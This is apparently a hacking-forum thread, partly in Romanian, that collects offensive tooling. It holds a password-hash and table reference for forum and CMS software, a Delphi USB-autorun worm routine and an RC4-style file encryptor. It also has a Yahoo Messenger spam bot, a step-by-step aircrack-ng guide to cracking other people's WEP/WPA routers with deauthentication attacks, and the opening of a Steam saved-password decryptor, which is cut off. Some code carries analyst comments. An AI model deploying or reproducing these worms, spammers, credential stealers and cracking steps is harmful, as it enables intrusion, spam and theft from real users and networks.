
  1. Credits: No idea who created this list..

List of algorithms used in forums:
------------------------------------------------------------------------------------
| Title              | Hash Algorithm               | Prefix        | Table            |
------------------------------------------------------------------------------------
| Beehive            | md5($pass)                   |               | USER             |
| Intellect Board    | md5($pass)                   |               | User             |
| IPB 1.x.x          | md5($pass)                   | ibf_          | members          |
| IPB 2.x.x          | md5(md5($salt).md5($pass))   | ibf_          | members_converge |
| ITA Forum          | md5($pass)                   | itaf_         | user             |
| MercuryBoard       | md5($pass)                   | mb_           | users            |
| MiniBB             | md5($pass)                   | minibbtable_  | users            |
| myBB 1.2.x         | md5(md5($salt).md5($pass))   | mybb_         | users            |
| phpBB              | md5($pass)                   | phpbb_        | users            |
| phpBB > 3.0.0 RC5  | md5(phpbb3)                  | phpbb_        | users            |
| PhpMyForum         | md5($pass)                   | pmf_          | user             |
| PunBB 1.2.x        | SHA-1                        | ???           | users            |
| SMF 1.0.x          | md5(HMAC)                    | smf_          | members          |
| SMF 1.1.x          | sha1($username.$pass)        | smf_          | members          |
| Snitz forums 2000  | SHA-256                      | FORUM_        | MEMBERS          |
| QuickSilver Forum  | md5($pass)                   | qsf_          | users            |
| UseBB              | md5($pass)                   | usebb_        | members          |
| Vanilla            | md5($pass)                   | LUM_          | User             |
| VBulletin          | md5(md5($pass).$salt)        |               | user             |
| VikingBoard        | md5($pass)                   | vboard_       | member           |
| W-Agora            | md5($pass)                   |               | users            |
| WWWThreads         | DES(unix)                    | w3t_          | users            |
| XMB Forum          | md5($pass)                   | ???           | members          |
| YaBB               | md5(HMAC)                    | yabbse_       | members          |
------------------------------------------------------------------------------------

List of algorithms used in CMS, online shops, etc.
------------------------------------------------------------------------------------
| Title              | Hash Algorithm               | Prefix        | Table            |
------------------------------------------------------------------------------------
| AboCMS             | md5($pass)                   | ???           | users            |
| DaneoCMS           | md5($pass)                   | dn[ ]_        | users            |
| DataLife Engine    | md5(md5($pass))              | dle_          | users            |
| e107               | md5(md5($pass))              | e107_         | user             |
| Joomla             | md5($pass)                   | jos_          | users            |
| Joomla >=1.0.13    | md5($pass.$salt)             | jos_          | users            |
| Koobi CMS          | md5($pass)                   | koobi_        | user             |
| Koobi CMS >= 6     | md5(md5($pass))              | koobi_        | user             |
| osCommerce         | md5($salt.$pass)             | ???           | customers        |
| PHP-Nuke           | md5($pass)                   | nuke_         | authors          |
| RunCMS             | sha1($username.$pass)        | runcms_       | users            |
| Slaed CMS          | md5($pass)                   | slaed_        | users            |
| Wordpress          | md5($pass)                   | wp_           | users            |
| Wordpress >= 2.5   | md5(phpbb3)                  | wp_           | users            |
| XOOPS              | md5($pass)                   | xoops_        | users            |
------------------------------------------------------------------------------------
  2. Inca mai functioneaza, desi e vechi.
  // Removable-media propagation routine (worm component). For every drive
  // letter A..Z whose type is DRIVE_REMOVABLE it copies the running executable
  // (ParamStr(0)) to the drive root as ExeName, appends "[autorun]" /
  // "open=ExeName" to <drive>:\autorun.inf and marks both files hidden.
  // Returns the number of drives written. The per-drive work sits inside an
  // empty except block, so every failure is silent.
  // Defender notes: the on-disk artefacts are a hidden autorun.inf in the root
  // of a removable drive whose open= line names a hidden executable beside it;
  // current Windows versions no longer honour autorun.inf on removable media
  // by default, which is what neutralises this technique.
  // The parameter name is garbled in the paste ("Exe******string"); the body
  // refers to it as ExeName.
  function InfectUsbDrives(Exe******string):integer;
  var
    Drive: Char;        // current drive letter
    myFile: TextFile;   // handle for <drive>:\autorun.inf
  begin
    Result := 0;
    for Drive := 'A' to 'Z' do
    begin
      if (GetDriveType(PChar(Drive + ':\'))= DRIVE_REMOVABLE) then
      begin
        try
          if(FileExists(Drive)=True)and(FileExists(Drive+':\'+ExeName)=False)then
          begin
            CopyFile(PChar(ParamStr(0)),PChar(Drive+':\'+ExeName),False);
            AssignFile(myFile, Drive+':\autorun.inf');
            // create the file if absent, otherwise append to the existing one
            if not FileExists(Drive+':\autorun.inf') then ReWrite(myFile) else Append(myFile);
            WriteLn(myFile,'[autorun]'+#13#10+'open='+ExeName);
            CloseFile(myFile);
            SetFileAttributes(PChar(Drive+':\'+ExeName), FILE_ATTRIBUTE_HIDDEN);
            SetFileAttributes(PChar(Drive+':\autorun.inf'), FILE_ATTRIBUTE_HIDDEN);
            Result := Result + 1;
          end;
        except
        end;
      end;
    end;
  end;
  ; RC4-style file en/decryptor (MASM32). Two drivers: EnDeCryptfile rewrites a
  ; file in place one byte at a time; EnDeCryptfile2 streams inputfile to
  ; savepath in 1024-byte blocks. Running either twice restores the data, since
  ; the transform is a XOR with a keystream.
  ;
  ; Cryptographic review (do not rely on this for confidentiality):
  ;  * Rc4_crypt resets i/j (ebx/eax) on entry and zeroes rc4keytable on exit,
  ;    and both drivers call Rc4_setkey again before every Rc4_crypt call, so
  ;    the keystream restarts for each call. EnDeCryptfile therefore XORs every
  ;    byte of the file with the same single keystream byte, and EnDeCryptfile2
  ;    reuses one 1024-byte keystream for every block. Neither is RC4 as
  ;    specified, and both are recoverable from the ciphertext alone.
  ;  * The key is a fixed literal compiled into the binary (mykey).
  ;  * RC4 itself is deprecated for new designs regardless of the above.
  .386p
  .model flat, stdcall
  option casemap:none ; Case sensitive
  include \Masm32\include\windows.inc
  include \Masm32\include\kernel32.inc
  include \Masm32\include\user32.inc
  includelib \Masm32\lib\kernel32.lib
  includelib \Masm32\lib\user32.lib
  EnDeCryptfile proto :DWORD
  EnDeCryptfile2 proto :DWORD,:DWORD
  Rc4_setkey proto :DWORD,:DWORD
  Rc4_crypt proto :DWORD, :DWORD
  ; CTEXT: places a NUL-terminated literal in .data and yields its address
  CTEXT MACRO text:VARARG
  LOCAL TxtName
  .data
  TxtName BYTE text,0
  .code
  EXITM <ADDR TxtName>
  ENDM
  .data
  mykey db "omgwtfjusthappenedtherethen",0    ; hard-coded key
  .data?
  data db 1024 dup(?) ; bytes read/write, can be turned up
  rc4keytable db 256 dup (?)                  ; RC4 state S[0..255]
  HoldBuf db 256 dup(?)                       ; not referenced anywhere in this listing
  hFileRead dd ?
  SizeWritten dd ?                            ; bytes actually read by ReadFile
  SizeWritten2 dd ?                           ; bytes actually written by WriteFile
  hFileRead2 dd ?
  .code
  start:
  invoke EnDeCryptfile,CTEXT("RC4d.exe") ; encrypts RC4.exe
  ;invoke EnDeCryptfile,CTEXT("RC4d.exe"); decrypt RC4.exe
  ;file test 2
  invoke EnDeCryptfile2,CTEXT("original.exe"),CTEXT("ENCRYPTED")
  invoke EnDeCryptfile2,CTEXT("ENCRYPTED"),CTEXT("DENCRYPTED.exe")
  invoke ExitProcess,0
  ;writes encrypted/decrypted data back into same file
  EnDeCryptfile proc inputfile:DWORD
  invoke CreateFile,inputfile,GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL
  cmp eax,INVALID_HANDLE_VALUE
  je @F
  mov hFileRead,eax
  .while TRUE
  invoke ReadFile,hFileRead,addr data,1,ADDR SizeWritten,NULL
  ; exits only on a successful zero-byte read; a failing ReadFile (eax = 0) keeps looping
  .break .if eax && SizeWritten == 0
  ; re-keying before every single byte: the keystream never advances past its first byte
  invoke lstrlen,addr mykey
  invoke Rc4_setkey,addr mykey,eax
  invoke Rc4_crypt,addr data,1
  ; step back one byte and overwrite it in place
  invoke SetFilePointer,hFileRead,-1,0,FILE_CURRENT
  invoke WriteFile,hFileRead,addr data,1,ADDR SizeWritten2,NULL
  .endw
  invoke CloseHandle,hFileRead
  @@:
  ret
  EnDeCryptfile endp
  ;writes en/decrypted file to external file, reads and writes 1024 bytes at a time but you can read as many as you like if you change the buffer size
  EnDeCryptfile2 proc inputfile:DWORD,savepath:DWORD
  invoke CreateFile,inputfile,GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL
  cmp eax,INVALID_HANDLE_VALUE
  je @F
  mov hFileRead,eax
  ; output handle is not checked against INVALID_HANDLE_VALUE
  invoke CreateFile,savepath,GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_ARCHIVE,NULL
  mov hFileRead2,eax
  .while TRUE
  invoke ReadFile,hFileRead,addr data,1024,ADDR SizeWritten,NULL
  ; same exit condition as above: only a successful zero-byte read ends the loop
  .break .if eax && SizeWritten == 0
  ; re-keyed per block, so every 1024-byte block gets the identical keystream
  invoke lstrlen,addr mykey
  invoke Rc4_setkey,addr mykey,eax
  invoke Rc4_crypt,addr data,1024
  ; always writes 1024 bytes even when the last ReadFile returned fewer
  ; (SizeWritten), so the output is padded with stale buffer contents
  invoke WriteFile,hFileRead2,addr data,1024,ADDR SizeWritten2,NULL
  .endw
  invoke CloseHandle,hFileRead
  invoke CloseHandle,hFileRead2
  @@:
  ret
  EnDeCryptfile2 endp
  ; Key-scheduling: fill S[i] = i, then for i in 0..255: j += S[i] + key[i mod LenPass]; swap S[i], S[j]
  ; Register roles: cl = i, al = j, ebx = key index, esi = key bytes remaining, edi = key pointer
  Rc4_setkey proc Pass:DWORD, LenPass:DWORD
  pushad
  mov eax, 0FFFEFDFCh
  mov ecx, 256/4
  Init_rc4keytable:
  ; one dword store per 4 entries: [252..255] = FC FD FE FF, then [248..251] = F8 F9 FA FB, ...
  mov dword ptr [rc4keytable+4*ecx-4], eax
  sub eax, 04040404h
  dec ecx
  jnz Init_rc4keytable
  xor eax, eax
  mov edi, Pass
  Key_return:
  ; key exhausted (or first pass): restart the key index at 0
  xor ebx, ebx
  mov esi ,LenPass
  jmp New_key
  Key_loop:
  inc bl
  dec esi
  jz Key_return
  New_key:
  mov dl, byte ptr [rc4keytable+ecx]
  add al, byte ptr [edi+ebx]
  add al, dl
  mov dh, byte ptr [rc4keytable+eax]
  mov byte ptr [rc4keytable+ecx], dh
  mov byte ptr [rc4keytable+eax], dl
  inc cl
  jnz Key_loop
  popad
  ret
  Rc4_setkey endp
  ; Keystream generation XORed in place over LenData bytes at iData:
  ; i++, j += S[i], swap S[i], S[j], out = S[(S[i] + S[j]) mod 256]
  ; Register roles: bl = i, al = j, esi = data pointer, edi = bytes remaining
  Rc4_crypt proc iData:DWORD, LenData:DWORD
  pushad
  mov edi, LenData
  mov esi, iData
  test edi, edi
  jz Rc4_enc_exit
  ; i and j restart from 0 on every call
  xor eax, eax
  xor edx, edx
  xor ecx, ecx
  xor ebx, ebx
  Rc4_enc_loop:
  inc bl
  mov dl, byte ptr [rc4keytable+ebx]
  add al, dl
  mov cl, byte ptr [rc4keytable+eax]
  mov byte ptr [rc4keytable+ebx], cl
  mov byte ptr [rc4keytable+eax], dl
  add cl, dl
  mov cl, byte ptr [rc4keytable+ecx]
  xor byte ptr [esi], cl
  inc esi
  dec edi
  jnz Rc4_enc_loop
  ; wipe the state table (64 zero dwords) before returning
  xor eax, eax
  mov edi, offset rc4keytable
  mov ecx, 256/4
  cld
  rep stosd
  Rc4_enc_exit:
  popad
  ret
  Rc4_crypt endp
  end start
  eNj0Y!
  4. Parti 1-8, bafta! http://securitytube.net/Assembly-Primer-for-Hackers-(Part-1)-System-Organization-video.aspx http://securitytube.net/Assembly-Primer-for-Hackers-(Part-2)-Virtual-Memory-Organization-video.aspx http://securitytube.net/Assembly-Primer-for-Hackers-(Part-3)-GDB-Usage-Primer-video.aspx http://securitytube.net/Assembly-Primer-for-Hackers-(Part-4)-Hello-World-video.aspx http://securitytube.net/Assembly-Primer-for-Hackers-(Part-5)-Data-Types-video.aspx http://securitytube.net/Assembly-Primer-for-Hackers-(Part-6)-Moving-Data-video.aspx http://securitytube.net/Assembly-Primer-for-Hackers-(Part-7)-Working-with-Strings-video.aspx http://securitytube.net/Assembly-Primer-for-Hackers-(Part-8)-Unconditional-Branching-video.aspx -Gonzalez
  5. Here's a little snippet I made a while back.. I tested on version 8.1.0 of YIM. You may want to implement delay, because as of now there is none. Info: Spams out a message to everyone in the Yahoo Messenger list of the target PC running it, provided YIM is open. It's just basic, and this is not a full spreader or anything, if you want that you will have to put work in it. I just made this one night in a few hrs for fun..
  ; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
  ;
  ; Yahoo Instant Messenger Spammer..
  ; Tested With YIM8.1.0.421
  ; Coded in MASM
  ;
  ; author drizzle@ymail.com
  ;
  ; You should probably use timers if you really gonna use this..
  ; There is no set delay..
  ;
  ; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
  ;
  ; Analyst summary: UI-automation spam bot for the Yahoo Messenger 8.1 client
  ; (long obsolete). It never touches the network itself: it locates the
  ; buddy-list ListView by walking the window-class chain YahooBuddyMain ->
  ; YTopWindow -> YTabListManager -> ATL:0084FD68 -> SysListView32, steps through
  ; the list with synthetic WM_KEYDOWN/WM_KEYUP messages, and for each buddy
  ; puts szSpamMessage into the YIMInputWindow of the opened IM window and
  ; presses its "&Send" button. The hard-coded class names and the WM_COMMAND id
  ; 32891 tie it to that exact build. Detection angle: a foreign process posting
  ; WM_KEYDOWN/WM_SETTEXT into YIM windows (user32 message injection) and a burst
  ; of identical outgoing messages. The included yah.asm is not on this page.
  ;
  ; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
  .486 ; create 32 bit code
  .model flat, stdcall ; 32 bit memory model
  option casemap :none ; case sensitive
  include \masm32\include\windows.inc
  include \masm32\include\masm32.inc
  include \masm32\include\gdi32.inc
  include \masm32\include\user32.inc
  include \masm32\include\kernel32.inc
  include \masm32\include\Comctl32.inc
  include \masm32\include\comdlg32.inc
  include \masm32\include\shell32.inc
  include \masm32\include\oleaut32.inc
  include \masm32\include\msvcrt.inc
  includelib \masm32\lib\masm32.lib
  includelib \masm32\lib\gdi32.lib
  includelib \masm32\lib\user32.lib
  includelib \masm32\lib\kernel32.lib
  includelib \masm32\lib\Comctl32.lib
  includelib \masm32\lib\comdlg32.lib
  includelib \masm32\lib\shell32.lib
  includelib \masm32\lib\oleaut32.lib
  includelib \masm32\lib\msvcrt.lib
  YBuddy PROTO
  YBuddyATL PROTO
  YBuddyList PROTO
  YBuddyCount PROTO
  YBuddySpam PROTO
  KPress PROTO :DWORD
  KPress2 PROTO :DWORD
  SendYM PROTO
  ; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
  ;
  ; write your code here
  ;
  ; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
  .code
  ;Message to .. SPAM!  (followed by 192 zero bytes; presumably slack for a longer message)
  szSpamMessage db "spaaaaaaam ...",0
  db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
  db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
  db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
  db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
  db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
  db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
  ; window-class names of the YIM 8.1 client used by FindWindow/FindWindowEx
  szYTopWindow db "YTopWindow",0
  szYTabListManager db "YTabListManager",0
  szATL db "ATL:0084FD68",0
  szSysListView32 db "SysListView32",0
  szYahooBuddyMain db "YahooBuddyMain",0
  szYSearchMenuWndClass db "YSearchMenuWndClass",0
  szIMClass db "IMClass",0
  szYIMInputWindow db "YIMInputWindow",0
  szButton db "Button",0
  szYMSend db "&Send",0
  ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  start:
  Main proc
  invoke YBuddySpam
  invoke ExitProcess,0
  Main endp
  ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  ; eax = HWND of the main buddy-list window (class YahooBuddyMain), or 0
  YBuddy proc
  invoke FindWindow, addr szYahooBuddyMain,0
  ret
  YBuddy endp
  ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  ; eax = HWND of the ATL host: YahooBuddyMain -> YTopWindow -> YTabListManager -> ATL:0084FD68
  ; (each FindWindowEx result is fed straight in as the next parent, unchecked)
  YBuddyATL proc
  invoke YBuddy
  mov ecx, eax
  invoke FindWindowEx,ecx, 0, addr szYTopWindow,0
  mov ecx, eax
  invoke FindWindowEx,ecx, 0, addr szYTabListManager,0
  mov ecx, eax
  invoke FindWindowEx,ecx, 0, addr szATL,0
  ret
  YBuddyATL endp
  ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  ; eax = HWND of the SysListView32 child of the ATL host, i.e. the buddy list itself
  YBuddyList proc
  invoke YBuddyATL
  mov ecx, eax
  invoke FindWindowEx,ecx, 0, addr szSysListView32,0
  ;invoke FindWindow, addr szYahooBuddyMain,0
  ret
  YBuddyList endp
  ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  ; eax = number of entries in the buddy list (LVM_GETITEMCOUNT)
  YBuddyCount proc
  invoke YBuddyList
  invoke SendMessage,eax, LVM_GETITEMCOUNT, 0, 0
  ret
  YBuddyCount endp
  ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  ; Main loop. First moves the selection to the top of the list (VK_UP lpCount
  ; times, or a single VK_DOWN when LVM_GETSELECTIONMARK reports no selection),
  ; brings the buddy window to the foreground, then for each remaining entry
  ; sends VK_DOWN, VK_RETURN, a 20 ms pause, VK_RETURN and calls SendYM.
  YBuddySpam proc
  LOCAL i1:DWORD, i2:DWORD, lpCount:DWORD
  LOCAL hBuddy:DWORD, hBuddyList:DWORD
  invoke YBuddyList
  mov hBuddyList, eax
  invoke YBuddy
  mov hBuddy, eax
  invoke SendMessage,eax, LVM_GETSELECTIONMARK, 0, 0
  .if eax == -1
  invoke KPress,VK_DOWN
  .else
  invoke YBuddyCount
  mov lpCount, eax
  mov i1, 0
  .While eax != i1
  invoke KPress, VK_UP
  add i1,1
  mov eax, lpCount
  .endw
  .endif
  invoke ShowWindow, hBuddy, 5
  invoke SetForegroundWindow,hBuddy
  mov i1, 1
  mov eax, lpCount
  .While eax != i1
  invoke KPress, VK_DOWN
  invoke KPress, VK_RETURN
  invoke Sleep, 20
  invoke KPress, VK_RETURN
  ;invoke
  add i1,1
  invoke SendYM
  mov eax, lpCount
  .endw
  ret
  YBuddySpam endp
  ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  ; Fills and submits one IM window: finds YSearchMenuWndClass, sends it
  ; WM_COMMAND 32891, locates IMClass -> YIMInputWindow, sets the text with
  ; WM_SETTEXT, finds the "&Send" Button, spins until it is enabled, presses it
  ; with WM_KEYDOWN/WM_KEYUP VK_SPACE and closes the window with WM_CLOSE.
  ; The jump back to @SendNewYahMsg is commented out, so one message per call.
  SendYM proc
  LOCAL lpYahMain:DWORD, i1:DWORD, i2:DWORD,i3:DWORD
  invoke FindWindow,addr szYSearchMenuWndClass,0
  mov lpYahMain, eax
  @SendNewYahMsg:
  ;invoke ShowWindow, lpYahMain, 0
  invoke SendMessage,lpYahMain, WM_COMMAND, 32891, 0
  invoke FindWindowEx,lpYahMain, 0, addr szIMClass, 0
  mov i1, eax
  invoke FindWindowEx,i1, 0, addr szYIMInputWindow, 0
  mov i3, eax
  invoke ShowWindow,lpYahMain,0
  invoke SendMessage,i3, WM_SETTEXT, 0, addr szSpamMessage
  invoke ShowWindow,lpYahMain,0
  invoke FindWindowEx,i1, 0, addr szButton, addr szYMSend
  mov i2, eax
  .if i2 == 0
  ret
  .endif
  ; busy-wait until the Send button becomes enabled
  invoke IsWindowEnabled,i2
  .While eax == 0
  invoke IsWindowEnabled,i2
  .endw
  invoke SendMessage,i2, WM_KEYDOWN, VK_SPACE, 0
  invoke SendMessage,i2, WM_KEYUP, VK_SPACE, 0
  invoke ShowWindow,lpYahMain,0
  invoke SendMessage,lpYahMain,WM_CLOSE,0,0
  invoke FindWindow,addr szYSearchMenuWndClass,0
  mov lpYahMain, eax
  .if eax > 0
  ;jmp @SendNewYahMsg
  .endif
  ret
  SendYM endp
  ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  ; Key press delivered to the buddy list as WM_KEYDOWN/WM_KEYUP (window-targeted, not global)
  KPress proc lpKey:DWORD
  invoke YBuddyList
  push eax
  invoke SendMessage,eax, WM_KEYDOWN, lpKey, 0
  pop eax
  invoke SendMessage,eax, WM_KEYUP, lpKey, 0
  ret
  KPress endp
  ; Alternative via keybd_event (global input injection); not called in this listing
  KPress2 proc lpKey:DWORD
  invoke keybd_event,lpKey, 0, 0, 0
  invoke keybd_event,lpKey, 0, KEYEVENTF_KEYUP, 0
  ret
  KPress2 endp
  ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  include yah.asm
  ;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  end start
  6. Imi place ideea. Interesanta descoperire. Mersi tinere. -Gonzalez
  7. Interesant si usor de inteles, felicitari cla1992 pentru tutorial. -Gonzalez
  8. Author ti.teg.tnod.I Note: This tutorial contains little fail safes - if you run into a problem you can try to post but Google is probably the best option This is a simple guide on hacking wireless routers with WPA/WEP security using aircrack-ng on Linux by ti.teg.tnod.I. Everything in this guide may work on Windows but is untested... Whenever I refer to a device/SSID/etc please just fill it in with the information YOU have gathered. WEP: Okay the first thing you should do (Unless you already know your wireless device's name) is run "iwconfig" to get the name of your wireless device. You should see something like this show up: lo no wireless extensions. eth0 no wireless extensions. wmaster0 no wireless extensions. wlan0 IEEE 802.11bg ESSID:"dlink" Mode:Managed Frequency:2.437 GHz Access Point: 00:1E:58:02:00:40 Bit Rate=54 Mb/s Tx-Power=27 dBm Retry min limit:7 RTS thr:off Fragment thr=2352 B Power Management:off Link Quality=63/100 Signal level:-48 dBm Noise level=-68 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 pan0 no wireless extensions. (All commands from here on will need root access) In this case the wireless device is "wlan0". So the next thing you need to do is put that device into "monitor mode". This mode should allow you to observe what's going on around you. You can do this by running: airmon-ng start wlan0 Which should return something similar to: Interface Chipset Driver wlan0 Broadcom 43xx b43 - [phy0] (monitor mode enabled on mon0) What we want to know is "mon0" which is the device we will use. Now we want to know what's going on around us...In order to do that we need to run: airodump-ng mon0 This should display a window that's pretty self explanatory it should look like this: CH 2 ][ Elapsed: 44 s ][ 2009-03-19 20:21 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:1E:58:02:00:40 204 129 46 0 6 54. 
WPA2 CCMP PSK dlink BSSID STATION PWR Rate Lost Packets Probes 00:1E:58:02:00:40 00:16:CF:1A:54:88 0 1- 0 0 56 dlink (not associated) 00:1F:3B:22:09:E3 196 0- 1 8 9 dlink Now see " 00:1E:58:02:00:40 204 129 46 0 6 54. WPA2 CCMP PSK dlink "? The 46 is the amount of IVs obtained (Used for cracking the password), the 0 is the amount of IVs obtained a second, the WPA2 is the type of security used (You need this to be WEP for this tutorial), and "00:1E:58:02:00:40" is the router's BSSID. The clients are listed in the lower section. Now you should note the channel the router is connected to (In this case it's 6). After you have done that you should terminate airodump-ng to free resources, closing the terminal won't do anything so run something like "killall airodump-ng" (Needs root). Okay after you've terminated the previous airodump-ng run: airodump-ng -c 6 --bssid 00:13:A3:0B:98:83 -w dump mon0 This is pretty self explanatory in my opinion, the "6" is the channel, the "00:13:A3:0B:98:83" is the BSSID of the router, "dump" is the prefix of the dump file (You'd be fine not touching that), and mon0 is the device. Now you should see a screen similar to the previous screen just maybe with less clutter. Now airodump-ng is only looking for connections from that channel and router and logging all the IVs to a file. You probably want to wait until the amount of "data" you've collected reaches 30 000 - 80 000 before trying to crack the password. If it's going slowly (0-1 IVs a second) try deauthenticating the client for IVs...There may be a better way than doing this but this method is the best method I know of that works. 
To deauthenticate a client first get their MAC address (Located under "STATION") and then run: aireplay-ng -0 70 -a 00:13:A3:0B:98:83 -c 00:1A:73:FA:1C:12 mon0 Okay the -0 means deauthentication, the 70 is how many deauths to send (You probably want 50-100, don't set a large number such as 1024 as the client may stop replying IVs for a bit.), "00:13:A3:0B:98:83" is the BSSID of the access point, "00:1A:73:FA:1C:12" is the MAC address of the client you're deauthing, and mon0 is the device. You shouldn't run this if you're already getting an alright amount of IVs (More than 0 a second) though as it could slow down the process. You may run this as many times as needed. Now finally if you think you have enough IVs (If you don't you can always repeat this step) you can make an attempt at the password: aircrack-ng -b 00:13:A3:0B:98:83 dump-01.cap Okay "00:13:A3:0B:98:83" is the BSSID of the router and "dump-01.cap" is the file where the IVs are located, alternatively you may run something like: aircrack-ng -b 00:13:A3:0B:98:83 dump*.cap That will include all the IV files with the prefix "dump" if you've separated them. If aircrack-ng seems to hang and doesn't fix itself within 45-60 seconds then feel free to terminate it and try again after another 5000-10 000 IVs. I hope this guide is clear...Any questions or comments feel free to post or PM me. 
I will do the WPA summary later but this is a quick breakdown (Which is just a list of commands really) sudo airmon-ng start wlan0 #Get the MAC address of your access point (00:1E:58:02:00:40) #Channel 6 (2.437GHz) sudo airodump-ng -c 6 --bssid 00:1E:58:02:00:40 -w psk mon0 #Optional: # -0 means deauthentication # 1 is the number of deauths to send (you can send multiple if you wish) # -a 00:14:6C:7E:40:80 is the MAC address of the access point # -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing sudo aireplay-ng -0 1 -a 00:1E:58:02:00:40 -c 00:1A:73:FA:1C:12 mon0 sudo aircrack-ng -w dictionary_english.dic -b 00:1E:58:02:00:40 psk*.cap
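  #include <windows.h>
  #include <cstdio>
  #include <iostream>
  using namespace std;

  // Reports whether the calling thread's effective security context is a member
  // of BUILTIN\Administrators.
  //
  // Why not walk TokenGroups by hand (as the previous version did): a group SID
  // can be present in a token but flagged SE_GROUP_USE_FOR_DENY_ONLY -- the
  // filtered, non-elevated token of an administrator under UAC is the common
  // case -- and a presence-only scan reports "admin" for such a token.
  // CheckTokenMembership counts only enabled groups, uses the thread's
  // impersonation token when one exists (the OpenThreadToken / OpenProcessToken
  // fallback done by hand before), and needs no fixed-size TOKEN_GROUPS buffer,
  // so a long group list cannot make the query fail.
  //
  // Returns: true when the caller is an enabled Administrators member, false
  //          otherwise or when the query itself fails. The Win9x special case
  //          (always true) is dropped: that platform has no security tokens.
  bool IsAdmin()
  {
      SID_IDENTIFIER_AUTHORITY siaNtAuthority = SECURITY_NT_AUTHORITY;
      PSID psidAdministrators = NULL;
      if (!AllocateAndInitializeSid(&siaNtAuthority, 2,
                                    SECURITY_BUILTIN_DOMAIN_RID,
                                    DOMAIN_ALIAS_RID_ADMINS,
                                    0, 0, 0, 0, 0, 0, &psidAdministrators))
          return false;

      // NULL token: thread impersonation token if impersonating, else the process token.
      BOOL bIsMember = FALSE;
      bool bRetval = (CheckTokenMembership(NULL, psidAdministrators, &bIsMember) != 0)
                     && (bIsMember != 0);
      FreeSid(psidAdministrators);
      return bRetval;
  }

  int main()
  {
      if (IsAdmin()) {
          cout << "You are an admin" << endl;
      } else {
          cout << "You are NOT an admin" << endl;
      }
      return 0;
  }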
  //
  // DecryptStoredSteamPassword.c
  //
  // Combines Luigi's ClientRegistry.blob parsing function(s)
  // with VALVe's exported SteamDecryptDataForThisMachine() function
  //
  // small code changes and comments added by desxor
  // again some changes and functions were added by Five-Three-Nine
  //
  // Analyst summary: local credential-recovery tool for an old Steam client.
  // It reads the install path from HKLM\Software\Valve\Steam\InstallPath, loads
  // Steam.dll from that directory, resolves its export
  // SteamDecryptDataForThisMachine, then scans ClientRegistry.blob for the
  // marker bytes 50 68 72 61 73 65 01 50 ("Phrase\x01P"), extracts the
  // encrypted password record that follows (ASCII hex in the sample dump below)
  // and asks the DLL to decrypt it; the DLL ties the encryption to the machine,
  // hence the "same machine?" message on failure. Finally it lists the
  // SteamApps\* directories as user names. Detection angle: a process other
  // than Steam loading Steam.dll and resolving that export, or reading
  // ClientRegistry.blob.

  #include <stdio.h>
  #include <stdint.h>
  #include <string.h>
  #include <sys/stat.h>
  #include <windows.h>

  void GetSteamDic(char *Path);
  void SteamParseEncryptedPassPhrase(uint8_t *fname);
  uint8_t *find_data(uint8_t *buff, int buffsz, uint8_t *str);

  /* signature of the Steam.dll export, resolved at run time */
  typedef int (__cdecl *SteamDecryptDataForThisMachine_t)(char *a, int b, char *c, int d, int *e);
  SteamDecryptDataForThisMachine_t SteamDecryptDataForThisMachine;

  int main(int argc, char *argv[])
  {
      HANDLE hSteamDLL;
      /* Find Steam Dir */
      char SteamPath[100] = {};
      char SteamDll[100] = {};
